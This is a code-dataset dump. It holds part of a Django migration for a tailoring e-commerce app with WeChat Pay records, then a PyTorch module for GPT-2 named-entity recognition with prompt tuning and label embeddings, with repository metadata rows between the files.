('type', models.CharField(default=b'A', choices=[(b'A', b'\xe5\xb7\xa5\xe4\xbd\x9c\xe6\x97\xb6\xe9\x97\xb4'), (b'B', b'\xe7\x89\xb9\xe6\xae\x8a\xe6\x97\xa5\xe6\x9c\x9f')], max_length=10, blank=True, null=True, verbose_name=b'\xe7\xb1\xbb\xe5\x9e\x8b')),
('start_time', models.CharField(default=b'0:00', choices=[(b'0:00', b'0:00'), (b'0:30', b'0:30'), (b'1:00', b'1:00'), (b'1:30', b'1:30'), (b'2:00', b'2:00'), (b'2:30', b'2:30'), (b'3:00', b'3:00'), (b'3:30', b'3:30'), (b'4:00', b'4:00'), (b'4:30', b'4:30'), (b'5:00', b'5:00'), (b'5:30', b'5:30'), (b'6:00', b'6:00'), (b'6:30', b'6:30'), (b'7:00', b'7:00'), (b'7:30', b'7:30'), (b'8:00', b'8:00'), (b'8:30', b'8:30'), (b'9:00', b'9:00'), (b'9:30', b'9:30'), (b'10:00', b'10:00'), (b'10:30', b'10:30'), (b'11:00', b'11:00'), (b'11:30', b'11:30'), (b'12:00', b'12:00'), (b'12:30', b'12:30'), (b'13:00', b'13:00'), (b'13:30', b'13:30'), (b'14:00', b'14:00'), (b'14:30', b'14:30'), (b'15:00', b'15:00'), (b'15:30', b'15:30'), (b'16:00', b'16:00'), (b'16:30', b'16:30'), (b'17:00', b'17:00'), (b'17:30', b'17:30'), (b'18:00', b'18:00'), (b'18:30', b'18:30'), (b'19:00', b'19:00'), (b'19:30', b'19:30'), (b'20:00', b'20:00'), (b'20:30', b'20:30'), (b'21:00', b'21:00'), (b'21:30', b'21:30'), (b'22:00', b'22:00'), (b'22:30', b'22:30'), (b'23:00', b'23:00'), (b'23:30', b'23:30')], max_length=10, blank=True, null=True, verbose_name=b'\xe5\xbc\x80\xe5\xa7\x8b\xe6\x97\xb6\xe9\x97\xb4')),
('end_time', models.CharField(default=b'0:00', choices=[(b'0:00', b'0:00'), (b'0:30', b'0:30'), (b'1:00', b'1:00'), (b'1:30', b'1:30'), (b'2:00', b'2:00'), (b'2:30', b'2:30'), (b'3:00', b'3:00'), (b'3:30', b'3:30'), (b'4:00', b'4:00'), (b'4:30', b'4:30'), (b'5:00', b'5:00'), (b'5:30', b'5:30'), (b'6:00', b'6:00'), (b'6:30', b'6:30'), (b'7:00', b'7:00'), (b'7:30', b'7:30'), (b'8:00', b'8:00'), (b'8:30', b'8:30'), (b'9:00', b'9:00'), (b'9:30', b'9:30'), (b'10:00', b'10:00'), (b'10:30', b'10:30'), (b'11:00', b'11:00'), (b'11:30', b'11:30'), (b'12:00', b'12:00'), (b'12:30', b'12:30'), (b'13:00', b'13:00'), (b'13:30', b'13:30'), (b'14:00', b'14:00'), (b'14:30', b'14:30'), (b'15:00', b'15:00'), (b'15:30', b'15:30'), (b'16:00', b'16:00'), (b'16:30', b'16:30'), (b'17:00', b'17:00'), (b'17:30', b'17:30'), (b'18:00', b'18:00'), (b'18:30', b'18:30'), (b'19:00', b'19:00'), (b'19:30', b'19:30'), (b'20:00', b'20:00'), (b'20:30', b'20:30'), (b'21:00', b'21:00'), (b'21:30', b'21:30'), (b'22:00', b'22:00'), (b'22:30', b'22:30'), (b'23:00', b'23:00'), (b'23:30', b'23:30')], max_length=10, blank=True, null=True, verbose_name=b'\xe7\xbb\x93\xe6\x9d\x9f\xe6\x97\xb6\xe9\x97\xb4')),
('start_day', models.DateTimeField(null=True, verbose_name=b'\xe5\xbc\x80\xe5\xa7\x8b\xe6\x97\xa5\xe6\x9c\x9f', blank=True)),
('end_day', models.DateTimeField(null=True, verbose_name=b'\xe7\xbb\x93\xe6\x9d\x9f\xe6\x97\xa5\xe6\x9c\x9f', blank=True)),
],
options={
'verbose_name': '\u9884\u7ea6\u65f6\u95f4\u9650\u5236',
'verbose_name_plural': '\u9884\u7ea6\u65f6\u95f4\u9650\u5236',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Wxpay',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('wxpay_id', models.CharField(max_length=128, null=True, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe6\x94\xaf\xe4\xbb\x98\xe8\xae\xa2\xe5\x8d\x95\xe5\x8f\xb7', blank=True)),
('out_trade_no', models.CharField(max_length=128, null=True, verbose_name=b'\xe5\x95\x86\xe6\x88\xb7\xe8\xae\xa2\xe5\x8d\x95\xe5\x8f\xb7', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('result_code', models.CharField(max_length=16, null=True, verbose_name=b'\xe4\xb8\x9a\xe5\x8a\xa1\xe7\xbb\x93\xe6\x9e\x9c', blank=True)),
('return_code', models.CharField(max_length=16, null=True, verbose_name=b'\xe8\xbf\x94\xe5\x9b\x9e\xe7\x8a\xb6\xe6\x80\x81\xe7\xa0\x81', blank=True)),
('openid', models.CharField(default=b'', max_length=32, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe7\x94\xa8\xe6\x88\xb7\xe6\xa0\x87\xe8\xaf\x86')),
('total_fee', models.FloatField(default=0, null=True, verbose_name=b'\xe6\x80\xbb\xe9\x87\x91\xe9\xa2\x9d', blank=True)),
('trade_type', models.CharField(max_length=16, null=True, verbose_name=b'\xe4\xba\xa4\xe6\x98\x93\xe7\xb1\xbb\xe5\x9e\x8b', blank=True)),
('bank_type', models.CharField(max_length=16, null=True, verbose_name=b'\xe4\xbb\x98\xe6\xac\xbe\xe9\x93\xb6\xe8\xa1\x8c', blank=True)),
('appid', models.CharField(max_length=32, null=True, verbose_name=b'\xe5\x85\xac\xe4\xbc\x97\xe8\xb4\xa6\xe5\x8f\xb7', blank=True)),
('mch_id', models.CharField(max_length=32, null=True, verbose_name=b'\xe5\x95\x86\xe6\x88\xb7\xe5\x8f\xb7', blank=True)),
],
options={
'verbose_name': '\u5fae\u4fe1\u652f\u4ed8\u8bb0\u5f55',
'verbose_name_plural': '\u5fae\u4fe1\u652f\u4ed8\u8bb0\u5f55',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='XiaBaiChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u4e0b\u6446\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u4e0b\u6446\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='XiuKouChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u8896\u53e3\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u8896\u53e3\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='XiuKouShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u8896\u6263\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u8896\u6263\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='YaoDouShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u8170\u515c\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u8170\u515c\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.AddField(
model_name='redpacket',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='order',
name='product',
field=models.ForeignKey(verbose_name=b'\xe4\xba\xa7\xe5\x93\x81', blank=True, to='wap.Product'),
preserve_default=True,
),
migrations.AddField(
model_name='order',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User'),
preserve_default=True,
),
migrations.AddField(
model_name='order',
name='wxpay',
field=models.ForeignKey(verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe6\x94\xaf\xe4\xbb\x98\xe8\xae\xb0\xe5\xbd\x95', blank=True, to='wap.Wxpay', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='measurereservation',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='fabric',
name='product',
field=models.ForeignKey(verbose_name=b'\xe6\x89\x80\xe5\xb1\x9e\xe4\xba\xa7\xe5\x93\x81', blank=True, to='wap.Product', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='coupon',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='cart',
name='fabric',
field=models.ForeignKey(verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99', blank=True, to='wap.Fabric', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='cart',
name='product',
field=models.ForeignKey(verbose_name=b'\xe4\xba\xa7\xe5\x93\x81', blank=True, to='wap.Product'),
preserve_default=True,
),
migrations.AddField(
model_name='cart',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User'),
preserve_default=True,
),
migrations.AddField(
model_name='cart',
name='wxpay',
field=models.ForeignKey(verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe6\x94\xaf\xe4\xbb\x98\xe8\xae\xb0\xe5\xbd\x95', blank=True, to='wap.Wxpay', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='banner',
name='product',
field=models.ForeignKey(verbose_name=b'\xe6\x89\x80\xe5\xb1\x9e\xe4\xba\xa7\xe5\x93\x81', blank=True, to='wap.Product', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='address4order',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User', null=True),
preserve_default=True,
),
]
| 98.809038 | 1,196 | 0.618016 | 10,975 | 67,783 | 3.74369 | 0.037813 | 0.082191 | 0.06513 | 0.072042 | 0.931365 | 0.915399 | 0.875849 | 0.856451 | 0.826587 | 0.802152 | 0 | 0.13789 | 0.167077 | 67,783 | 685 | 1,197 | 98.953285 | 0.589854 | 0.00031 | 0 | 0.600884 | 0 | 0.309278 | 0.420646 | 0.331375 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.001473 | 0.004418 | 0 | 0.008837 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
84ab2f2f74fcf4901e8859509f2dcebed47b57c6 | 22,587 | py | Python | models/gpt_LE_for_ner.py | 20000607-lxc/BERT-NER-Pytorch-master | 47f2e1291ab53674986eb91abdb72693eafe9b61 | [
"MIT"
] | null | null | null | models/gpt_LE_for_ner.py | 20000607-lxc/BERT-NER-Pytorch-master | 47f2e1291ab53674986eb91abdb72693eafe9b61 | [
"MIT"
] | null | null | null | models/gpt_LE_for_ner.py | 20000607-lxc/BERT-NER-Pytorch-master | 47f2e1291ab53674986eb91abdb72693eafe9b61 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import CrossEntropyLoss
from losses.focal_loss import FocalLoss
from losses.label_smoothing import LabelSmoothingCrossEntropy
from .transformers_master.models.gpt2.modeling_gpt2 import GPT2Model as New_GPT2
from models.p_tuning.prompt_encoder import PromptEncoder
from torch.nn.utils.rnn import pad_sequence
from transformers import GPT2LMHeadModel
from models.p_tuning.label_embedder import LabelEmbeder
class GPT2SoftmaxForNer_LE(torch.nn.Module):
"""
one step 输出input 对应的 hidden state
"""
def __init__(self, config, device, template, model_name=None):
super().__init__()
self.device = device
self.num_labels = config.num_labels
if model_name == None:# 用于load gpt2-large
model_name = 'gpt2'
self.LMgpt2 = GPT2LMHeadModel.from_pretrained(model_name).to(self.device)
self.gpt2 = self.LMgpt2.base_model# New_GPT2.from_pretrained(model_name).to(self.device)# 可以接受inputs_embeds和input_ids
self.embeddings = self.gpt2.get_input_embeddings().to(device)#embedding是GPT2LMHeadModel的embedding
# self.embeddings.weight.requires_grad = False
# for param in self.gpt2.parameters():
# param.requires_grad = False
# perform fine_tuning
self.dropout = nn.Dropout(config.resid_pdrop).to(self.device)
self.classifier = nn.Linear(config.hidden_size, config.num_labels).to(self.device)
self.linear = nn.Linear(2*config.hidden_size, config.hidden_size).to(self.device)
self.loss_type = 'ce'
self.pseudo_token_id = 50257# prompt word 的id
self.hidden_size = self.embeddings.embedding_dim
self.template = template
self.pad_token_id = 0
self.spell_length = sum(self.template)
self.prompt_encoder = PromptEncoder(self.template, self.hidden_size, device)
self.prompt_encoder = self.prompt_encoder.to(device)
self.num_entities = 9# todo for conll2003 区分bio or bieso
self.label_embedding = LabelEmbeder([self.num_entities], self.hidden_size, device).to(self.device)
self.attn_linear = nn.Linear(self.hidden_size, self.hidden_size).to(self.device)
self.fc = nn.Linear(self.hidden_size, 1, bias=False).to(self.device)
self.tanh = nn.Tanh().to(self.device)
self.softmax = nn.Softmax().to(self.device)
self.linear_out = nn.Linear(2*self.hidden_size, self.hidden_size).to(self.device)
print("***************** init GPT2SoftmaxForNer with label embedding *********************")
def get_query(self, input_id, prompt_tokens):
input = []
prompt1 = []
prompt2 = []
count = 0
for i in range(self.template[0]):
prompt1.append(prompt_tokens[0])
for i in range(self.template[1]):
prompt2.append(prompt_tokens[0])
for i in range(len(input_id)):
if input_id[i] != 0:
count += 1
input.append(input_id[i].item())
if self.template[0] == self.template[1]:
query = prompt1 + input + prompt2 + input
else:
query = prompt1 + input + prompt2
return query, count
def embed_input(self, queries, counts):
"""
turn the queries(word index) :[batch_size,query_length]
into embeddings: [batch_size,query_length,768]
"""
bz = queries.shape[0]
queries_for_embedding = queries.clone()
queries_for_embedding[(queries == self.pseudo_token_id)] = self.pseudo_token_id-1
replace_embeds = self.prompt_encoder()
raw_embeds = self.embeddings(queries_for_embedding)
for bidx in range(bz):
for i in range(self.template[0]):
raw_embeds[bidx, i, :] = replace_embeds[i, :]
for i in range(self.template[1]):
raw_embeds[bidx, i+counts[bidx]+self.template[0], :] = replace_embeds[i+self.template[0], :]
return raw_embeds
def attention(self, input_state, label_init, bz):
"""
Args:
input_state: [batch_size, hidden state]
label_embedding: [batch_size, num_label_type, hidden state]
Returns:
output_state:[batch_size, hidden state]
"""
label_embedding = torch.empty(bz, self.num_entities, self.hidden_size).to(self.device)# [bz, 5, hs]
for k in range(bz):
label_embedding[k, :, :] = label_init
input_state_attn = self.attn_linear(input_state).unsqueeze(2)
input_state_attn = self.tanh(input_state_attn)# [bz, hs, 1]
weights = torch.bmm(label_embedding, input_state_attn).squeeze(2)# [bz, 5, hs] * [bz, hs, 1] = [bz, 5] 表示五类label的分数
weights = self.softmax(weights)
c_t = torch.bmm(weights.unsqueeze(1), label_embedding).squeeze(1)# [bz, 1, 5] * [bz, 5, hs] = [bz, hs] = sigma(c_i*label_i)
output = self.tanh(self.linear_out(torch.cat([c_t, input_state], 1)))
return output
# def attention(self, input_state, label_embedding, bz):
# """
# Args:
# input_state: [batch_size, hidden state]
# label_embedding: [batch_size, num_label_type, hidden state]
#
# Returns:
# output_state:[batch_size, hidden state]
# """
# input_state_attn = self.attn_linear(input_state)
# input_state_expanded = input_state_attn.unsqueeze(1).expand(bz, self.num_entities, self.hidden_size).contiguous() # B x 5 x hidden_dim
# input_state_expanded = input_state_expanded.view(-1, self.hidden_size) # B*5 x hidden_dim
#
# label_embedding_fea = label_embedding.view(-1, self.hidden_size)
# att_features = label_embedding_fea + input_state_expanded # B*self.num_entities x hidden_dim
# e = torch.tanh(att_features)
# scores = self.fc(e) # B*self.num_entities x 1
# scores = scores.view(-1, self.num_entities) # B x self.num_entities
# attn_dist_ = F.softmax(scores, dim=1) # B x self.num_entities
# normalization_factor = attn_dist_.sum(1, keepdim=True)
# attn_dist = attn_dist_ / normalization_factor
# attn_dist = attn_dist.unsqueeze(1) # B x 1 x self.num_entities
# output_state = torch.bmm(attn_dist, label_embedding) # B x 1 x self.num_entities * self.num_entities x hidden_dim
#
# output_state = output_state.squeeze(1)
# output_state += input_state
# return output_state
# def add_label_embedding(self, sequence_output, label_init, counts=None):
# """
# Args:
# sequence_output: the input embeds or the gpt2 output logits
# Returns:
# output: add label embedding to input embeds
#
# """
# bz = sequence_output.shape[0]
# new_sequence_output = torch.zeros_like(sequence_output).to(self.device)
# label_embedding = torch.empty(bz, self.num_entities, self.hidden_size).to(self.device)
#
# for k in range(bz):
# label_embedding[k, :, :] = label_init
#
# for i in range(sequence_output.shape[1]):
# new_sequence_output[:, i, :] = self.attention(sequence_output[:, i, :], label_embedding, bz)
# # donot use a = ...a , which will trigger error during loss.backward() cause this assigns value to one variable repeatedly
#
# for bidx in range(bz):
# # input ids 对应的embedding不变
# new_sequence_output[bidx, self.template[0]:counts[bidx]+self.template[0], :] =\
# sequence_output[bidx, self.template[0]:counts[bidx]+self.template[0], :]
#
# return new_sequence_output
def add_label_embedding(self, sequence_output, label_init):
"""
Args:
sequence_output: the output hidden state from gpt2 model [batch_size, sequence_length, 768]
Returns:
output: add label embedding to sequence_output [batch_size, sequence_length, 768]
"""
bz = sequence_output.shape[0]
new_sequence_output = torch.empty(sequence_output.shape).to(self.device)
for i in range(sequence_output.shape[1]):
new_sequence_output[:, i, :] = self.attention(sequence_output[:, i, :], label_init, bz)
return new_sequence_output
def forward(self, input_ids, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, labels=None):
"""
Args:
input_ids: padded seuqence:[batch_size, max_length]
if Chinese: input_ids = [101,...,102, 0,...,0]
attention_mask: [batch_size, max_length]
token_type_ids: [batch_size, max_length]
position_ids: [batch_size, max_length]
head_mask: [batch_size, max_length]
labels: [batch_size, max_length]
Returns:
outputs
"""
label_init = self.label_embedding()
bz = len(input_ids)#batch_size
bx = len(input_ids[0])
prompt_tokens = [self.pseudo_token_id]
counts = []
queries = []
for i in range(bz):
query, count = self.get_query(input_ids[i], prompt_tokens)
counts.append(count)
queries.append(torch.LongTensor(query).squeeze(0))
queries = pad_sequence(queries, True, padding_value=self.pad_token_id).long().to(self.device)
attention_mask1 = queries != self.pad_token_id
inputs_embeds = self.embed_input(queries, counts)
inputs = inputs_embeds.to(self.device)
outputs = self.gpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
# decode the output ids to see if there is some patterns
outputs2 = self.LMgpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
example = torch.argsort(outputs2[0], dim=2, descending=True)[:, sum(self.template)+max(counts):, 0].to(self.device)
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
sequence = torch.zeros(bz, bx, self.hidden_size).to(self.device)
for bdix in range(bz):
if self.template[0] == self.template[1]:
place = sum(self.template)+counts[bdix]# 45 = 6+6+32+1
else:
place = self.template[0] + counts[bdix]
sequence[bdix, :counts[bdix], :] = sequence_output[bdix, place:place+counts[bdix], :]
# todo 只截取没有pad的id对应的input
# add label embedding
new_sequence = self.add_label_embedding(sequence, label_init)
logits = self.classifier(new_sequence)
outputs = (example,)+outputs[2:]
outputs = (logits,) + outputs # add hidden states and attention if they are here
if labels is not None:
assert self.loss_type in ['lsr', 'focal', 'ce']
if self.loss_type == 'lsr':
loss_fct = LabelSmoothingCrossEntropy()
elif self.loss_type == 'focal':
loss_fct = FocalLoss()
else:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.contiguous().view(-1) == 1
active_logits = logits.contiguous().view(-1, self.num_labels)[active_loss]
active_labels = labels.contiguous().view(-1)[active_loss]
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(logits.contiguous().view(-1, self.num_labels), labels.contiguous().view(-1))
outputs = (loss,) + outputs
return outputs
class GPT2generateForNer_LE(torch.nn.Module):
"""
循环输出hidden state, 在每一步的output中加入label embedding
"""
def __init__(self, config, device, template, model_name=None):
super().__init__()
self.device = device
self.num_labels = config.num_labels
if model_name == None:# 用于load gpt2-large
model_name = 'gpt2'
self.LMgpt2 = GPT2LMHeadModel.from_pretrained(model_name).to(self.device)
self.gpt2 = self.LMgpt2.base_model# New_GPT2.from_pretrained(model_name).to(self.device)# 可以接受inputs_embeds和input_ids
self.embeddings = self.gpt2.get_input_embeddings().to(device)#embedding是GPT2LMHeadModel的embedding
# self.embeddings.weight.requires_grad = False
# for param in self.gpt2.parameters():
# param.requires_grad = False
self.dropout = nn.Dropout(config.resid_pdrop).to(self.device)
self.classifier = nn.Linear(config.hidden_size, config.num_labels).to(self.device)
self.linear = nn.Linear(2*config.hidden_size, config.hidden_size).to(self.device)
self.loss_type = 'ce'
self.pseudo_token_id = 50257# prompt word 的id
self.hidden_size = self.embeddings.embedding_dim
self.template = template
self.pad_token_id = 0
self.spell_length = sum(self.template)
self.prompt_encoder = PromptEncoder(self.template, self.hidden_size, device)
self.prompt_encoder = self.prompt_encoder.to(device)
self.num_entities = 9# todo for conll2003 区分bio or bieso
self.label_embedding = LabelEmbeder([self.num_entities], self.hidden_size, device).to(self.device)
self.label_embedding = self.label_embedding.to(self.device)
self.attn_linear = nn.Linear(self.hidden_size, self.hidden_size).to(self.device)
self.fc = nn.Linear(self.hidden_size, 1, bias=False).to(self.device)
self.tanh = nn.Tanh().to(self.device)
self.softmax = nn.Softmax().to(self.device)
self.linear_out = nn.Linear(2*self.hidden_size, self.hidden_size).to(self.device)
print("***************** init GPT2SoftmaxForNer with label embedding *********************")
print("**************** generate hidden state in a loop ****************")
print("***************** "+str(model_name) + " *********************")
print("************** num_labels *** "+str(self.num_labels) + " *********************")
def get_query(self, input_id, prompt_tokens):
input = []
prompt1 = []
prompt2 = []
count = 0
for i in range(self.template[0]):
prompt1.append(prompt_tokens[0])
for i in range(self.template[1]):
prompt2.append(prompt_tokens[0])
for i in range(len(input_id)):
if input_id[i] != 0:
count += 1
input.append(input_id[i].item())
query = prompt1 + input + prompt2
return query, count
def embed_input(self, queries, counts):
"""
turn the queries(word index) :[batch_size,query_length]
into embeddings: [batch_size,query_length,768]
"""
bz = queries.shape[0]
queries_for_embedding = queries.clone()
queries_for_embedding[(queries == self.pseudo_token_id)] = self.pseudo_token_id-1
replace_embeds = self.prompt_encoder()
raw_embeds = self.embeddings(queries_for_embedding)
for bidx in range(bz):
for i in range(self.template[0]):
raw_embeds[bidx, i, :] = replace_embeds[i, :]
for i in range(self.template[1]):
raw_embeds[bidx, i+counts[bidx]+self.template[0], :] = replace_embeds[i+self.template[0], :]
return raw_embeds
def attention(self, input_state, label_init, bz):
"""
Args:
input_state: [batch_size, hidden state]
label_embedding: [batch_size, num_label_type, hidden state]
Returns:
output_state:[batch_size, hidden state]
"""
label_embedding = torch.empty(bz, self.num_entities, self.hidden_size).to(self.device)# [bz, 5, hs]
for k in range(bz):
label_embedding[k, :, :] = label_init
input_state_attn = self.attn_linear(input_state).unsqueeze(2)
input_state_attn = self.tanh(input_state_attn)# [bz, hs, 1]
weights = torch.bmm(label_embedding, input_state_attn).squeeze(2)# [bz, 5, hs] * [bz, hs, 1] = [bz, 5] 表示五类label的分数
weights = self.softmax(weights)
c_t = torch.bmm(weights.unsqueeze(1), label_embedding).squeeze(1)# [bz, 1, 5] * [bz, 5, hs] = [bz, hs] = sigma(c_i*label_i)
output = self.tanh(self.linear_out(torch.cat([c_t, input_state], 1)))
return output
# def old_attention(self, input_state, label_init, bz):
# """
# Args:
# input_state: [batch_size, hidden state]
# label_embedding: [batch_size, num_label_type, hidden state]
#
# Returns:
# output_state:[batch_size, hidden state]
# """
# label_embedding = torch.empty(bz, self.num_entities, self.hidden_size).to(self.device)
# for k in range(bz):
# label_embedding[k, :, :] = label_init
#
# input_state_attn = self.attn_linear(input_state)
# input_state_expanded = input_state_attn.unsqueeze(1).expand(bz, self.num_entities, self.hidden_size).contiguous() # B x 5 x hidden_dim
# input_state_expanded = input_state_expanded.view(-1, self.hidden_size) # B*5 x hidden_dim
#
# label_embedding_fea = label_embedding.view(-1, self.hidden_size)
#
# #
# att_features = label_embedding_fea + input_state_expanded # B*self.num_entities x hidden_dim
# e = torch.tanh(att_features)
# scores = self.fc(e) # B*self.num_entities x 1
# scores = scores.view(-1, self.num_entities) # B x self.num_entities
# attn_dist_ = F.softmax(scores, dim=1) # B x self.num_entities
# normalization_factor = attn_dist_.sum(1, keepdim=True)
# attn_dist = attn_dist_ / normalization_factor
# attn_dist = attn_dist.unsqueeze(1) # B x 1 x self.num_entities
# output_state = torch.bmm(attn_dist, label_embedding) # B x 1 x self.num_entities * B x self.num_entities x hidden_dim
#
# output_state = output_state.squeeze(1)
# output_state += input_state
# return output_state
def add_label_embedding(self, sequence_output, label_init):
"""
Args:
sequence_output: the output hidden state from gpt2 model [batch_size, 1, 768]
Returns:
output: add label embedding to sequence_output [batch_size, 1, 768]
"""
bz = sequence_output.shape[0]
new_sequence_output = self.attention(sequence_output, label_init, bz)
return new_sequence_output
def forward(self, input_ids, attention_mask=None, token_type_ids=None,
position_ids=None, head_mask=None, labels=None):
"""
Args:
input_ids: padded seuqence:[batch_size, max_length]
if Chinese: input_ids = [101,...,102, 0,...,0]
attention_mask: [batch_size, max_length]
token_type_ids: [batch_size, max_length]
position_ids: [batch_size, max_length]
head_mask: [batch_size, max_length]
labels: [batch_size, max_length]
Returns:
outputs
"""
label_init = self.label_embedding()
bz = len(input_ids)#batch_size
prompt_tokens = [self.pseudo_token_id]
counts = []
queries = []
for i in range(bz):
query, count = self.get_query(input_ids[i], prompt_tokens)
counts.append(count)
queries.append(torch.LongTensor(query).squeeze(0))
queries = pad_sequence(queries, True, padding_value=self.pad_token_id).long().to(self.device)
attention_mask1 = queries != self.pad_token_id
inputs_embeds = self.embed_input(queries, counts)
inputs = inputs_embeds.to(self.device)
outputs = self.gpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
outputs2 = self.LMgpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
example = torch.argsort(outputs2[0], dim=2, descending=True)[:, sum(self.template)+max(counts):, 0]
sequence_output = outputs[0][..., -1, :]# [batch_size, 768]
past_key_values = outputs.past_key_values
assert outputs[0][0][0][0] == outputs.last_hidden_state[0][0][0]
sequence = torch.zeros(input_ids.shape[0], input_ids.shape[1], self.hidden_size).to(self.device)
# 第一个token
new_sequence_output = self.add_label_embedding(sequence_output, label_init)
sequence[:, 0, :] = new_sequence_output
# loop
for round in range(1, max(counts)):
input_this_step = inputs[:, self.template[0]+round-1:self.template[0]+round, :]
outputs = self.gpt2(inputs_embeds=input_this_step,
past_key_values=past_key_values, return_dict=None)
sequence_output = outputs[0][..., -1, :]
past_key_values = outputs.past_key_values
new_sequence_output = self.add_label_embedding(sequence_output, label_init)
sequence[:, round, :] = new_sequence_output
sequence = self.dropout(sequence)
logits = self.classifier(sequence)
outputs = (example,)+outputs[2:]
outputs = (logits,) + outputs# add hidden states and attention if they are here
if labels is not None:
assert self.loss_type in ['lsr', 'focal', 'ce']
if self.loss_type == 'lsr':
loss_fct = LabelSmoothingCrossEntropy()
elif self.loss_type == 'focal':
loss_fct = FocalLoss()
else:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.contiguous().view(-1) == 1
active_logits = logits.contiguous().view(-1, self.num_labels)[active_loss]
active_labels = labels.contiguous().view(-1)[active_loss]
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(logits.contiguous().view(-1, self.num_labels), labels.contiguous().view(-1))
outputs = (loss,) + outputs
return outputs # (loss), scores, (hidden_states), (attentions)
| 45.355422 | 145 | 0.620578 | 2,824 | 22,587 | 4.735127 | 0.092776 | 0.046066 | 0.035896 | 0.022734 | 0.866961 | 0.854322 | 0.847891 | 0.836599 | 0.836449 | 0.826503 | 0 | 0.01611 | 0.260725 | 22,587 | 497 | 146 | 45.44668 | 0.784705 | 0.311462 | 0 | 0.821293 | 0 | 0 | 0.025003 | 0.005631 | 0 | 0 | 0 | 0.006036 | 0.011407 | 1 | 0.045627 | false | 0 | 0.041825 | 0 | 0.13308 | 0.019011 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
046d3630dfcfd983f47a4fdccb1dbc4439c44764 | 74,967 | py | Python | RI/flask_server/tapi_server/controllers/tapi_path_computation_controller.py | arthurMll/TAPI | e1171bb139c6791a953af09cfc2bc7ad928da73d | [
"Apache-2.0"
] | 57 | 2018-04-09T08:56:18.000Z | 2022-03-23T08:31:06.000Z | RI/flask_server/tapi_server/controllers/tapi_path_computation_controller.py | arthurMll/TAPI | e1171bb139c6791a953af09cfc2bc7ad928da73d | [
"Apache-2.0"
